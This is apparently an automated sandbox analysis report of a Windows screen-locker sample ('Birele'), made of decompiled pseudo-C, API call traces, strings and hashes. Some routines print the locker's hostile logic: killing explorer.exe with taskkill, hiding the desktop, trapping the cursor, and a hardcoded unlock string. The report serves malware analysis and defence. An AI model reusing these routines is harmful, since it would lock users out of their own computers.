                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404AEA
                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404B08
                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00404B26
                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,00404BB5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404B6F
                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,00404D1C,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,00404BB5,?,80000001), ref: 00404B8D
                                                                                                                                                  • RegCloseKey.ADVAPI32(?,00404BBC,00000000,00000000,00000005,00000000,00404BB5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404BAF
                                                                                                                                                  • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00404BCC
                                                                                                                                                  • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00404BD9
                                                                                                                                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00404BDF
                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 00404C0A
                                                                                                                                                  • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 00404C51
                                                                                                                                                  • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 00404C61
                                                                                                                                                  • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 00404C89
                                                                                                                                                  • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 00404C99
                                                                                                                                                  • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 00404CBF
                                                                                                                                                  • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 00404CCF
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                                                  • String ID: .$Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                                  • API String ID: 1759228003-3917250287
                                                                                                                                                  • Opcode ID: f6af56f1720421a918e5e21f07f9e7cb961e80019e6e28d89f09e10ff1b83a93
                                                                                                                                                  • Instruction ID: 36f382792d8f6a15946af365c1c16693b3cf50086e74e5892625d65cdf9cf2f1
                                                                                                                                                  • Opcode Fuzzy Hash: f6af56f1720421a918e5e21f07f9e7cb961e80019e6e28d89f09e10ff1b83a93
                                                                                                                                                  • Instruction Fuzzy Hash: C75188B1A4024C7AFB21D6A58C46FEF76BC9B44744F4101B7BB00F61C2E6789E448B68
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00415E7C(intOrPtr* __eax, void* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                  				void* __ebx;
                                                                                                                                                  				void* __edi;
                                                                                                                                                  				void* __esi;
                                                                                                                                                  				intOrPtr* _t74;
                                                                                                                                                  				void* _t119;
                                                                                                                                                  				void* _t149;
                                                                                                                                                  				void* _t283;
                                                                                                                                                  				intOrPtr* _t284;
                                                                                                                                                  				intOrPtr _t306;
                                                                                                                                                  				intOrPtr _t316;
                                                                                                                                                  				intOrPtr _t319;
                                                                                                                                                  				intOrPtr _t324;
                                                                                                                                                  				intOrPtr _t337;
                                                                                                                                                  				intOrPtr _t340;
                                                                                                                                                  				intOrPtr _t344;
                                                                                                                                                  				intOrPtr _t363;
                                                                                                                                                  				intOrPtr _t367;
                                                                                                                                                  				intOrPtr _t371;
                                                                                                                                                  				intOrPtr _t388;
                                                                                                                                                  
                                                                                                                                                  				_t399 = __eflags;
                                                                                                                                                  				_t387 = __edx;
                                                                                                                                                  				_t284 = __eax;
                                                                                                                                                  				_t306 =  *0x415e68; // 0x415e74
                                                                                                                                                  				 *_t284 = E004067F8(_t306, __eflags);
                                                                                                                                                  				_t388 = E00406780(E00406FB4(__eflags), 0x14, 0x9d);
                                                                                                                                                  				 *((intOrPtr*)( *_t284 + 0x18)) = _t388;
                                                                                                                                                  				_t74 =  *0x4185a4; // 0x4198a8
                                                                                                                                                  				 *_t74 = _t388;
                                                                                                                                                  				_t2 =  *_t284 + 0x18; // 0x2171158
                                                                                                                                                  				E00406828( *_t2,  *_t284);
                                                                                                                                                  				E00406298( *((intOrPtr*)( *_t284 + 0x18)), 0, _t399);
                                                                                                                                                  				E00406274( *((intOrPtr*)( *_t284 + 0x18)), 0x1f0, 0x2c1);
                                                                                                                                                  				E00407EE0( *((intOrPtr*)( *_t284 + 0x18)), 1);
                                                                                                                                                  				E00407A44( *((intOrPtr*)( *_t284 + 0x18)), 0x1f0, 0xf0caa6, _t399);
                                                                                                                                                  				E004061CC( *((intOrPtr*)( *_t284 + 0x18)), 0xf0caa6, 0x41702c,  *_t284);
                                                                                                                                                  				 *((intOrPtr*)( *_t284 + 0x50)) = E00406450(0xbb8, _t399);
                                                                                                                                                  				E00406828( *((intOrPtr*)( *_t284 + 0x18)), _t95);
                                                                                                                                                  				_t316 =  *((intOrPtr*)( *_t284 + 0x50));
                                                                                                                                                  				 *((intOrPtr*)(_t316 + 0x25)) =  *_t284;
                                                                                                                                                  				 *((intOrPtr*)(_t316 + 0x21)) = E00417130;
                                                                                                                                                  				 *((intOrPtr*)( *_t284 + 0x30)) = E00406450(1, _t399);
                                                                                                                                                  				E00406828( *((intOrPtr*)( *_t284 + 0x18)), _t102);
                                                                                                                                                  				_t319 =  *((intOrPtr*)( *_t284 + 0x30));
                                                                                                                                                  				 *((intOrPtr*)(_t319 + 0x25)) =  *_t284;
                                                                                                                                                  				 *((intOrPtr*)(_t319 + 0x21)) = 0x416fe4;
                                                                                                                                                  				 *((intOrPtr*)( *_t284 + 0x2c)) = E0040675C(E00406780(E004082E0(_t387, _t102, _t399), 0x5e, 0x121), 1);
                                                                                                                                                  				E00405F18(E00407D04(_t112), 0x808080);
                                                                                                                                                  				_t119 = E00407D04( *((intOrPtr*)( *_t284 + 0x2c)));
                                                                                                                                                  				_t324 =  *0x4163d4; // 0x1
                                                                                                                                                  				E00406AFC(_t119, _t324, _t399);
                                                                                                                                                  				E0040819C(E00407D04( *((intOrPtr*)( *_t284 + 0x2c))));
                                                                                                                                                  				E00407A44( *((intOrPtr*)( *_t284 + 0x2c)), 0x5e, 0xf0caa6, _t399);
                                                                                                                                                  				 *((intOrPtr*)( *_t284 + 0x24)) = E00406428(E00407B6C(E00406780(E00408398(2, _t399), 0, 0), 0x23, 0x2c1, _t399), 0);
                                                                                                                                                  				E00407A44(_t133, 0x23, 0x800000, _t399);
                                                                                                                                                  				 *((intOrPtr*)( *_t284 + 0x28)) = E00406428(E0040675C(E00406780(E004082E0(_t387, _t133, _t399), 8, 0xe0), 1), 2);
                                                                                                                                                  				E00405F18(E00407D04(_t142), 0x80000005);
                                                                                                                                                  				_t149 = E00407D04( *((intOrPtr*)( *_t284 + 0x28)));
                                                                                                                                                  				_t337 =  *0x4163d4; // 0x1
                                                                                                                                                  				E00406AFC(_t149, _t337, _t399);
                                                                                                                                                  				E0040819C(E00407D04( *((intOrPtr*)( *_t284 + 0x28))));
                                                                                                                                                  				E00407A44( *((intOrPtr*)( *_t284 + 0x28)), 8, 0x800000, _t399);
                                                                                                                                                  				_t340 =  *0x416408; // 0x8
                                                                                                                                                  				 *((intOrPtr*)( *_t284 + 0x48)) = E00406780(E004070AC( *((intOrPtr*)( *_t284 + 0x18)), _t340, _t387, _t142, _t399), 0x30, 0x1f0);
                                                                                                                                                  				E004076E0(_t161);
                                                                                                                                                  				E0040766C( *((intOrPtr*)( *_t284 + 0x48)), "79670416978\r\n79091516876\r\n79670416917\r\n79096507761\r\n79036688774\r\n79096507761\r\n");
                                                                                                                                                  				_t344 =  *0x416464; // 0x8b
                                                                                                                                                  				 *((intOrPtr*)( *_t284 + 0x38)) = E00407B6C(E00406780(E004070AC( *((intOrPtr*)( *_t284 + 0x18)), _t344, _t387, _t161, _t399), 0x150, 0), 0xa1, 0x2c1, _t399);
                                                                                                                                                  				E00405F18(E00407D04(_t172), 0x80000000);
                                                                                                                                                  				E0040819C(E00407D04( *((intOrPtr*)( *_t284 + 0x38))));
                                                                                                                                                  				E00407F74( *((intOrPtr*)( *_t284 + 0x38)), 2);
                                                                                                                                                  				E004075FC( *((intOrPtr*)( *_t284 + 0x38)), LoadCursorA(0, 0x7f00));
                                                                                                                                                  				E004072F8( *((intOrPtr*)( *_t284 + 0x38)), 0);
                                                                                                                                                  				E0040766C( *((intOrPtr*)( *_t284 + 0x38)), 0x416488);
                                                                                                                                                  				 *((intOrPtr*)( *_t284 + 0x3c)) = E00407B6C(E00406780(E00408320(0x41670c, _t387, _t172, _t399), 0x118, 0xa8), 0x31, 0x191, _t399);
                                                                                                                                                  				E00406104(_t198, 0);
                                                                                                                                                  				E0040819C(E00407D04( *((intOrPtr*)( *_t284 + 0x3c))));
                                                                                                                                                  				 *((intOrPtr*)( *_t284 + 0x40)) = E00406428(E00407B6C(E00406780(E00406FF0(0x416720, _t387, _t198, _t399), 0x16, 0xb0), 0, 0xd9, _t399), 1);
                                                                                                                                                  				_t363 =  *0x416730; // 0x0
                                                                                                                                                  				 *((intOrPtr*)( *_t284 + 0x44)) = E00407B6C(E00406780(E004070AC( *((intOrPtr*)( *_t284 + 0x3c)), _t363, _t387, _t198, _t399), 0x16, 8), 0, 0xa1, _t399);
                                                                                                                                                  				_t367 =  *0x416730; // 0x0
                                                                                                                                                  				 *((intOrPtr*)( *_t284 + 0x4c)) = E00406780(E004070AC( *((intOrPtr*)( *_t284 + 0x18)), _t367, _t387, _t198, _t399), 0x38, 0x1f8);
                                                                                                                                                  				E004076E0(_t220);
                                                                                                                                                  				E0040766C( *((intOrPtr*)( *_t284 + 0x4c)), "123123123");
                                                                                                                                                  				_t371 =  *0x416748; // 0x9b
                                                                                                                                                  				 *((intOrPtr*)( *_t284 + 0x34)) = E00407B6C(E00406780(E004070AC( *((intOrPtr*)( *_t284 + 0x18)), _t371, _t387, _t220, _t399), 0x20, 0), 0x131, 0x2c1, _t399);
                                                                                                                                                  				E0040819C(E00407D04(_t231));
                                                                                                                                                  				E00407F74( *((intOrPtr*)( *_t284 + 0x34)), 2);
                                                                                                                                                  				E004075FC( *((intOrPtr*)( *_t284 + 0x34)), LoadCursorA(0, 0x7f00));
                                                                                                                                                  				E004072F8( *((intOrPtr*)( *_t284 + 0x34)), 0);
                                                                                                                                                  				E0040766C( *((intOrPtr*)( *_t284 + 0x34)), 0x416754);
                                                                                                                                                  				E00406430( *((intOrPtr*)( *_t284 + 0x40)), 0x416754, E00417030,  *_t284);
                                                                                                                                                  				E00407A44( *((intOrPtr*)( *_t284 + 0x48)), 0x131, 0x80000005, _t399);
                                                                                                                                                  				E00407A44( *((intOrPtr*)( *_t284 + 0x44)), 0x131, 0x80000005, _t399);
                                                                                                                                                  				E00406400( *((intOrPtr*)( *_t284 + 0x44)), 0x131, 0x80000005, E00417118,  *_t284);
                                                                                                                                                  				E00407A44( *((intOrPtr*)( *_t284 + 0x38)), 0x131, 0x800000, _t399);
                                                                                                                                                  				E00407A44( *((intOrPtr*)( *_t284 + 0x4c)), 0x131, 0x80000005, _t399);
                                                                                                                                                  				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t284 + 0x30)))) + 8))();
                                                                                                                                                  				E00407A44( *((intOrPtr*)( *_t284 + 0x34)),  *((intOrPtr*)( *((intOrPtr*)( *_t284 + 0x30)))), 0xf0caa6, _t399);
                                                                                                                                                  				E00407EAC(E00407E20( *((intOrPtr*)( *_t284 + 0x18)), 0xf0caa6, _t231), 0, 0);
                                                                                                                                                  				E0040802C( *((intOrPtr*)( *_t284 + 0x18)), 0x116, 0, 0);
                                                                                                                                                  				_t283 = E00416E5C( *_t284, _t284,  *_t284, _t231, 0); // executed
                                                                                                                                                  				return _t283;
                                                                                                                                                  			}






















                                                                                                                                                  0x00415e7c
                                                                                                                                                  0x00415e7f
                                                                                                                                                  0x00415e81
                                                                                                                                                  0x00415e83
                                                                                                                                                  0x00415e90
                                                                                                                                                  0x00415ead
                                                                                                                                                  0x00415eb1
                                                                                                                                                  0x00415eb4
                                                                                                                                                  0x00415eb9
                                                                                                                                                  0x00415ebf
                                                                                                                                                  0x00415ec2
                                                                                                                                                  0x00415ece
                                                                                                                                                  0x00415ee2
                                                                                                                                                  0x00415eee
                                                                                                                                                  0x00415efd
                                                                                                                                                  0x00415f0f
                                                                                                                                                  0x00415f22
                                                                                                                                                  0x00415f2c
                                                                                                                                                  0x00415f35
                                                                                                                                                  0x00415f38
                                                                                                                                                  0x00415f3b
                                                                                                                                                  0x00415f50
                                                                                                                                                  0x00415f5a
                                                                                                                                                  0x00415f63
                                                                                                                                                  0x00415f66
                                                                                                                                                  0x00415f69
                                                                                                                                                  0x00415f99
                                                                                                                                                  0x00415fa8
                                                                                                                                                  0x00415fb2
                                                                                                                                                  0x00415fb7
                                                                                                                                                  0x00415fbd
                                                                                                                                                  0x00415fd1
                                                                                                                                                  0x00415fe0
                                                                                                                                                  0x00416014
                                                                                                                                                  0x0041601e
                                                                                                                                                  0x00416056
                                                                                                                                                  0x00416065
                                                                                                                                                  0x0041606f
                                                                                                                                                  0x00416074
                                                                                                                                                  0x0041607a
                                                                                                                                                  0x0041608e
                                                                                                                                                  0x0041609d
                                                                                                                                                  0x004160a7
                                                                                                                                                  0x004160c6
                                                                                                                                                  0x004160cd
                                                                                                                                                  0x004160dc
                                                                                                                                                  0x004160e6
                                                                                                                                                  0x00416111
                                                                                                                                                  0x00416120
                                                                                                                                                  0x00416134
                                                                                                                                                  0x00416140
                                                                                                                                                  0x00416158
                                                                                                                                                  0x00416164
                                                                                                                                                  0x00416173
                                                                                                                                                  0x004161a9
                                                                                                                                                  0x004161b0
                                                                                                                                                  0x004161c4
                                                                                                                                                  0x004161ff
                                                                                                                                                  0x00416207
                                                                                                                                                  0x00416230
                                                                                                                                                  0x00416238
                                                                                                                                                  0x00416257
                                                                                                                                                  0x0041625e
                                                                                                                                                  0x0041626d
                                                                                                                                                  0x00416277
                                                                                                                                                  0x004162a2
                                                                                                                                                  0x004162b1
                                                                                                                                                  0x004162bd
                                                                                                                                                  0x004162d5
                                                                                                                                                  0x004162e1
                                                                                                                                                  0x004162f0
                                                                                                                                                  0x00416302
                                                                                                                                                  0x00416311
                                                                                                                                                  0x00416320
                                                                                                                                                  0x00416332
                                                                                                                                                  0x00416341
                                                                                                                                                  0x00416350
                                                                                                                                                  0x0041635e
                                                                                                                                                  0x0041636b
                                                                                                                                                  0x0041637c
                                                                                                                                                  0x00416390
                                                                                                                                                  0x00416399
                                                                                                                                                  0x004163a1

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00407EE0: SetWindowPos.USER32(?,?,00000000,00000000,00000000,00000000,00000013,00415EF3,?,?,?,00417268), ref: 00407F03
                                                                                                                                                    • Part of subcall function 00407A44: DeleteObject.GDI32(00000000), ref: 00407A85
                                                                                                                                                    • Part of subcall function 0040766C: SendMessageA.USER32(?,0000000C,00000000,?), ref: 00407689
                                                                                                                                                  • LoadCursorA.USER32(00000000,00007F00), ref: 0041614C
                                                                                                                                                    • Part of subcall function 004075FC: GetCursorPos.USER32 ref: 00407630
                                                                                                                                                    • Part of subcall function 004075FC: SetCursor.USER32 ref: 0040765E
                                                                                                                                                    • Part of subcall function 004072F8: EnableWindow.USER32(?,?), ref: 0040731E
                                                                                                                                                  • LoadCursorA.USER32(00000000,00007F00), ref: 004162C9
                                                                                                                                                    • Part of subcall function 00407E20: GetSystemMetrics.USER32(00000001), ref: 00407E2F
                                                                                                                                                    • Part of subcall function 00407E20: GetSystemMetrics.USER32(00000000), ref: 00407E37
                                                                                                                                                    • Part of subcall function 0040802C: SendMessageA.USER32(00000000,?,?,?), ref: 00408041
                                                                                                                                                    • Part of subcall function 00416E5C: WinExec.KERNEL32(taskkill /F /IM explorer.exe,00000000), ref: 00416E79
                                                                                                                                                    • Part of subcall function 00416E5C: SystemParametersInfoA.USER32(00000061,00000001,00000000,00000000), ref: 00416E97
                                                                                                                                                    • Part of subcall function 00416E5C: FindWindowA.USER32(00000000,Program Manager), ref: 00416EA5
                                                                                                                                                    • Part of subcall function 00416E5C: ShowWindow.USER32(00000000,00000000,00000000,00416EED,?,?,00000000), ref: 00416EAB
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CursorWindow$System$LoadMessageMetricsSend$DeleteEnableExecFindInfoObjectParametersShow
                                                                                                                                                  • String ID: +79874418224$123123123$796704169787909151687679670416917790965077617903668877479096507761$Tahoma$Times New Roman$t^A$windowssecurity
                                                                                                                                                  • API String ID: 3507070501-296219220
                                                                                                                                                  • Opcode ID: 5a39b68fbc3096504723c7640abd55bc9b63af0bdc9dd852676b73a232ed63b2
                                                                                                                                                  • Instruction ID: 27c486c3e8a3f134475cd8ba4614be99faec494537bb50f6dd228413fb19958b
                                                                                                                                                  • Opcode Fuzzy Hash: 5a39b68fbc3096504723c7640abd55bc9b63af0bdc9dd852676b73a232ed63b2
                                                                                                                                                  • Instruction Fuzzy Hash: D1E1FF747045508FD740EB6AC4D1F5933A1EF49308B1250BAF6059F7ABCA39EC46CB9A
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  C-Code - Quality: 21%
                                                                                                                                                  			E00416FDD() {
                                                                                                                                                  				intOrPtr* _t1;
                                                                                                                                                  				signed char _t2;
                                                                                                                                                  				signed char _t3;
                                                                                                                                                  
                                                                                                                                                  				L0:
                                                                                                                                                  				while(1) {
                                                                                                                                                  					L0:
                                                                                                                                                  					asm("in eax, dx");
                                                                                                                                                  					L1:
                                                                                                                                                  					asm("out dx, al");
                                                                                                                                                  					asm("in al, dx");
                                                                                                                                                  					asm("out dx, eax");
                                                                                                                                                  					asm("cld");
                                                                                                                                                  					asm("invalid");
                                                                                                                                                  					asm("in eax, 0xf0");
                                                                                                                                                  					 *_t1 =  *_t1 + _t1;
                                                                                                                                                  					_t3 = (_t3 & _t2) + _t1;
                                                                                                                                                  					asm("sti");
                                                                                                                                                  					asm("out dx, eax");
                                                                                                                                                  					asm("out dx, al");
                                                                                                                                                  				}
                                                                                                                                                  			}






                                                                                                                                                  0x00416fdd
                                                                                                                                                  0x00416fdd
                                                                                                                                                  0x00416fdd
                                                                                                                                                  0x00416fdd
                                                                                                                                                  0x00416fcb
                                                                                                                                                  0x00416fcd
                                                                                                                                                  0x00416fce
                                                                                                                                                  0x00416fcf
                                                                                                                                                  0x00416fd0
                                                                                                                                                  0x00416fd1
                                                                                                                                                  0x00416fd3
                                                                                                                                                  0x00416fd5
                                                                                                                                                  0x00416fd7
                                                                                                                                                  0x00416fd9
                                                                                                                                                  0x00416fda
                                                                                                                                                  0x00416fdb
                                                                                                                                                  0x00416fdb

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00416F28: FindWindowA.USER32(00000000,00416F9C), ref: 00416F2F
                                                                                                                                                    • Part of subcall function 00416F28: PostMessageA.USER32 ref: 00416F3F
                                                                                                                                                    • Part of subcall function 00416F28: FindWindowA.USER32(00000000,00416FB4), ref: 00416F4B
                                                                                                                                                    • Part of subcall function 00416F28: PostMessageA.USER32(00000000,00000012,00000001,00000000), ref: 00416F5B
                                                                                                                                                    • Part of subcall function 00416F28: FindWindowA.USER32 ref: 00416F67
                                                                                                                                                    • Part of subcall function 00416F28: PostMessageA.USER32(00000000,00000012,00000001,00000000), ref: 00416F77
                                                                                                                                                    • Part of subcall function 00416F28: FindWindowA.USER32(00000000,00416FD8), ref: 00416F83
                                                                                                                                                    • Part of subcall function 00416F28: PostMessageA.USER32(00000000,00000012,00000001,00000000), ref: 00416F93
                                                                                                                                                  • FindWindowA.USER32(00000000,windowssecurity), ref: 00416FF4
                                                                                                                                                  • RegisterHotKey.USER32(00000000,00000001,00000001,00000009,00000000,windowssecurity), ref: 00417002
                                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00417009
                                                                                                                                                  • ClipCursor.USER32(?,00000000,?,00000000,00000001,00000001,00000009,00000000,windowssecurity), ref: 0041700F
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$Find$MessagePost$ClipCursorRectRegister
                                                                                                                                                  • String ID: windowssecurity
                                                                                                                                                  • API String ID: 505866272-157953542
                                                                                                                                                  • Opcode ID: db7d503e70215804a70644be5847b025879004143e273917d71a57d4b60336b9
                                                                                                                                                  • Instruction ID: 99952fe6f4652e6864b052181ed5fff2235b68c3f5804291cb8f6624d4c7a39a
                                                                                                                                                  • Opcode Fuzzy Hash: db7d503e70215804a70644be5847b025879004143e273917d71a57d4b60336b9
                                                                                                                                                  • Instruction Fuzzy Hash: 3ED05BA2A8971076EE1033770CC7F4B1444CB24B55F45447FB5047D0C3E4EDC454185D
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                                  			E004078A0(void* __eax, void* __edx) {
                                                                                                                                                  				long _t7;
                                                                                                                                                  
                                                                                                                                                  				asm("jecxz 0xc");
                                                                                                                                                  				_t7 = CallWindowProcA( *(__eax + 0x2c),  *(__eax + 0x1c),  *(__edx + 4),  *(__edx + 8),  *(__edx + 0xc)); // executed
                                                                                                                                                  				return _t7;
                                                                                                                                                  			}




                                                                                                                                                  0x004078ac
                                                                                                                                                  0x004078b2
                                                                                                                                                  0x004078b7

                                                                                                                                                  APIs
                                                                                                                                                  • CallWindowProcA.USER32(?,?,?,?,?), ref: 004078B2
                                                                                                                                                  • NtdllDefWindowProc_A.NTDLL(?,?,?,?,004063B4), ref: 004078BA
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$CallNtdllProcProc_
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1646280189-0
                                                                                                                                                  • Opcode ID: da0314159296e04eb806244f3bfd1d90df0a83b9894212b70f72b2477c7770f2
                                                                                                                                                  • Instruction ID: 9ed542ce46b8d06a915efcceea0ca04d5527b2fa981ab7a9de5197e2c1487863
                                                                                                                                                  • Opcode Fuzzy Hash: da0314159296e04eb806244f3bfd1d90df0a83b9894212b70f72b2477c7770f2
                                                                                                                                                  • Instruction Fuzzy Hash: 14D0C979010001AFCA466F50C800C15FF32FF48311385C7E9A2082A1728A3AE8A0EF45
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 25 40732c-40733a 26 407346-40734e 25->26 27 40733c-40733f 25->27 29 407350-407356 26->29 30 407361-40736d call 4073ce call 4073d6 26->30 27->26 28 407341-407343 27->28 28->26 29->30 32 407358-40735a 29->32 37 407372-40737a 30->37 32->30 33 40735c call 4073ce 32->33 33->30 38 4073a6-4073aa 37->38 39 40737c-407382 37->39 42 4073b5-4073b9 38->42 43 4073ac-4073b0 38->43 40 407393-4073a1 PostQuitMessage 39->40 41 407384-40738d call 4078f8 39->41 45 407576-40757f call 4078a0 40->45 41->40 41->45 46 4073bb-4073c9 SetWindowLongA 42->46 47 4073ed-4073f1 42->47 43->45 48 407596-40759a 45->48 46->48 49 4073f3-407405 call 4078a0 47->49 50 40740a-40740e 47->50 74 407595 49->74 55 407410-407419 50->55 56 407459-40745d 50->56 55->45 59 40741f-407428 call 4078f8 55->59 60 407488-407493 56->60 61 40745f-407468 call 4078c0 56->61 59->45 78 40742e-407434 59->78 62 407495-4074a8 SendMessageA 60->62 63 4074ad-4074b1 60->63 72 407581 61->72 73 40746e-407483 call 4078a0 61->73 68 407583-40758b 62->68 69 4074b3-4074bf GetWindowLongA 63->69 70 4074dd-4074e8 63->70 68->74 75 40758d-407591 68->75 69->45 76 4074c5-4074d8 SendMessageA 69->76 70->45 77 4074ee-4074f6 GetFocus 70->77 72->68 73->48 74->48 75->74 76->68 77->72 80 4074fc-40750b 77->80 78->45 81 40743a-407454 PostMessageA 78->81 84 407518-407519 80->84 85 40750d-407516 80->85 81->72 84->68 86 40751b-40752c GetKeyState * 2 84->86 85->84 86->45 88 40752e-407534 86->88 89 407536-40753a 88->89 90 40753e-407547 call 407cf4 88->90 91 40753c 89->91 92 40756f-407574 89->92 90->45 95 407549-40756d 90->95 91->45 92->68 95->45 95->92
                                                                                                                                                  C-Code - Quality: 80%
                                                                                                                                                  			E0040732C(void* __eax, intOrPtr* __edx) {
                                                                                                                                                  				void* __ebx;
                                                                                                                                                  				void* __edi;
                                                                                                                                                  				void* __esi;
                                                                                                                                                  				void* __ebp;
                                                                                                                                                  				signed int _t44;
                                                                                                                                                  				void* _t46;
                                                                                                                                                  				struct HWND__* _t47;
                                                                                                                                                  				long _t48;
                                                                                                                                                  				signed int _t53;
                                                                                                                                                  				signed int _t55;
                                                                                                                                                  				signed int _t58;
                                                                                                                                                  				signed int _t60;
                                                                                                                                                  				long _t63;
                                                                                                                                                  				signed int _t66;
                                                                                                                                                  				signed int _t71;
                                                                                                                                                  				intOrPtr _t72;
                                                                                                                                                  				intOrPtr _t96;
                                                                                                                                                  				intOrPtr* _t110;
                                                                                                                                                  				void* _t113;
                                                                                                                                                  				intOrPtr* _t116;
                                                                                                                                                  				intOrPtr _t121;
                                                                                                                                                  				void* _t124;
                                                                                                                                                  
                                                                                                                                                  				_t113 = __eax;
                                                                                                                                                  				_t110 = __edx;
                                                                                                                                                  				_t116 =  *((intOrPtr*)(__eax + 0x60));
                                                                                                                                                  				if(0 !=  *__edx && 0 ==  *((intOrPtr*)(__eax + 0x1c))) {
                                                                                                                                                  					 *((intOrPtr*)(__eax + 0x1c)) =  *__edx;
                                                                                                                                                  				}
                                                                                                                                                  				_t121 =  *0x4198a4; // 0x1
                                                                                                                                                  				if(_t121 != 0) {
                                                                                                                                                  					_t96 =  *0x4198a8; // 0x2170a88
                                                                                                                                                  					asm("jecxz 0xb");
                                                                                                                                                  					if(_t96 != _t113) {
                                                                                                                                                  						E004073CE(_t96, _t110, _t113);
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				_t88 = _t113;
                                                                                                                                                  				E004073CE(_t113, _t110, _t113);
